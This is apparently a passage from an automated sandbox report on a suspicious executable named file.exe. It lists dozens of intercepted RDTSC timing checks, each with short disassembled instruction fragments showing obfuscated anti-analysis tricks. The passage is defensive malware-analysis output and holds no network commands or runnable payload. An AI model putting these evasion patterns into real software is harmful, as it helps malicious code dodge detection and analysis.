push FFFFFFFFh 0x00000067 call 00007FCBA4817E7Fh 0x0000006c mov edi, dword ptr [ebp+122D279Ch] 0x00000072 pop ebx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62A7C0 second address: 62A7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C966 second address: 62C96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62E7CF second address: 62E7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA46BC746h 0x00000008 jnp 00007FCBA46BC736h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007FCBA46BC738h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62F784 second address: 62F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630731 second address: 630737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630737 second address: 630761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FCBA4817E78h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630761 second address: 6307CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FCBA46BC738h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007FCBA46BC73Ah 0x00000028 push 00000000h 0x0000002a mov di, 9F92h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov di, si 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 632E35 second address: 632E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633CA6 second address: 633D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d xor ebx, dword ptr [ebp+122D3926h] 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 mov di, si 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FCBA46BC738h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 movsx ebx, dx 0x00000038 mov edi, dword ptr [ebp+1244B235h] 0x0000003e xchg eax, esi 0x0000003f jmp 00007FCBA46BC743h 0x00000044 push eax 0x00000045 je 00007FCBA46BC748h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633D11 second address: 633D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6308F2 second address: 630908 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA46BC73Ch 0x00000008 jnl 00007FCBA46BC736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635D28 second address: 635DBC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FCBA4817E78h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D388Eh] 0x0000002b call 00007FCBA4817E82h 0x00000030 jnl 00007FCBA4817E7Ch 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 jmp 00007FCBA4817E84h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FCBA4817E78h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a mov bl, ah 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jg 00007FCBA4817E76h 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DBC second address: 635DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 630908 second address: 63090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DC0 second address: 635DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 635DC6 second address: 635DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 636D6C second address: 636D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCBA46BC736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633E98 second address: 633EC1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E80h 0x00000008 jmp 00007FCBA4817E7Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCBA4817E82h 0x00000018 jmp 00007FCBA4817E7Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 633EC1 second address: 633ECB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBA46BC73Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62C95B second address: 62C966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FAF second address: 638FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FB3 second address: 638FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FBB second address: 638FD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCBA46BC740h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FD0 second address: 638FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FD8 second address: 638FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 638FDE second address: 639003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E83h 0x0000000e push edi 0x0000000f je 00007FCBA4817E76h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 639003 second address: 639008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 639008 second address: 639012 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA4817E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E66E second address: 63E67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCBA46BC73Ah 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 63E67D second address: 63E6BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA4817E7Ah 0x00000008 jp 00007FCBA4817E78h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FCBA4817E82h 0x00000019 jmp 00007FCBA4817E80h 0x0000001e popad 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC46D second address: 5CC492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCBA46BC736h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FCBA46BC743h 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CC492 second address: 5CC498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642263 second address: 64228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Fh 0x00000009 jmp 00007FCBA46BC744h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64228F second address: 642293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 642293 second address: 6422F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FCBA46BC745h 0x0000000f jne 00007FCBA46BC736h 0x00000015 pop ebx 0x00000016 jo 00007FCBA46BC741h 0x0000001c jmp 00007FCBA46BC73Bh 0x00000021 popad 0x00000022 push ebx 0x00000023 jmp 00007FCBA46BC742h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b pop edx 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6422F1 second address: 6422FB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA4817E76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641948 second address: 64195C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 je 00007FCBA46BC736h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64195C second address: 641988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jo 00007FCBA4817E9Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FCBA4817E76h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 641988 second address: 64198C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 646B14 second address: 646B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D732 second address: 64D74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jp 00007FCBA46BC736h 0x0000000c ja 00007FCBA46BC736h 0x00000012 push edi 0x00000013 pop edi 0x00000014 jnp 00007FCBA46BC736h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D74D second address: 64D76C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E7Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C541 second address: 64C547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C547 second address: 64C54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C54C second address: 64C551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64C551 second address: 64C559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CB47 second address: 64CB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCBA46BC736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CDB6 second address: 64CDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64CDBA second address: 64CDD8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBA46BC736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FCBA46BC73Ch 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D40F second address: 64D415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D415 second address: 64D419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D59B second address: 64D59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D59F second address: 64D5B1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FCBA46BC736h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D5B1 second address: 64D5D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007FCBA4817E76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6514A2 second address: 6514C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC748h 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF86F second address: 5CF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF874 second address: 5CF879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5CF879 second address: 5CF883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655976 second address: 655980 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA46BC736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655980 second address: 655986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 655986 second address: 65599E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBA46BC738h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FCBA46BC736h 0x00000012 jp 00007FCBA46BC736h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65599E second address: 6559B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E87h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65B7 second address: 5D65BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65BF second address: 5D65C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65C3 second address: 5D65E2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FCBA46BC738h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007FCBA46BC75Ah 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65E2 second address: 5D65ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5D65ED second address: 5D65F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65470F second address: 654731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E88h 0x00000007 jns 00007FCBA4817E76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 654731 second address: 65473D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FCBA46BC736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65473D second address: 654741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623033 second address: 623084 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FCBA46BC73Bh 0x0000000e nop 0x0000000f mov di, 3306h 0x00000013 lea eax, dword ptr [ebp+12482DDCh] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FCBA46BC738h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jg 00007FCBA46BC736h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623084 second address: 623089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623089 second address: 602FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FCBA46BC738h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ecx, eax 0x00000026 mov dx, si 0x00000029 call dword ptr [ebp+122D28EBh] 0x0000002f jc 00007FCBA46BC74Dh 0x00000035 jo 00007FCBA46BC738h 0x0000003b push esi 0x0000003c pop esi 0x0000003d push ecx 0x0000003e push esi 0x0000003f pop esi 0x00000040 jmp 00007FCBA46BC73Bh 0x00000045 pop ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push edx 0x0000004a pop edx 0x0000004b jg 00007FCBA46BC736h 0x00000051 push edi 0x00000052 pop edi 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236AF second address: 6236B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236B5 second address: 6236BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236BB second address: 6236E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 318B15D5h 0x0000000f push ecx 0x00000010 sub dword ptr [ebp+122D2157h], esi 0x00000016 pop edx 0x00000017 call 00007FCBA4817E79h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 jno 00007FCBA4817E76h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236E7 second address: 6236F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC73Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6236F5 second address: 623751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jne 00007FCBA4817E80h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jnp 00007FCBA4817E84h 0x0000001c mov eax, dword ptr [eax] 0x0000001e jmp 00007FCBA4817E88h 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623920 second address: 623924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623924 second address: 62392A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623A36 second address: 623A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623A3C second address: 623A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C6D second address: 623C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C79 second address: 623C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 623C7D second address: 623C83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
